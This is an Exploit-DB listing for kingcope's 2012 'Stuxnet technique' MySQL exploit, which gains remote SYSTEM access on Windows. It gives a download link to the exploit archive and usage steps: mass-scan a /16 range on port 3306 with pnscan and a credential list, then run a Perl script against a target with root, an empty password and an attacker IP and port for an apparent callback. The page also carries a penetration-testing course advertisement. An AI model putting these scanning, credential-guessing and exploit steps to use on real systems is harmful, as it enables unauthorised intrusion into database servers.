MySQL - 'Stuxnet Technique' Windows Remote System

EDB-ID:

23083

CVE:

N/A


Author:

kingcope

Type:

remote


Platform:

Windows

Date:

2012-12-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23083.zip

use this on a fast scan server!

How to use.
pnscan:

the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".

#make lnx
#./pnscan 192.168.0.0/16 3306

exploit:
#perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

user root on windows will mostly succeed.

/Kingcope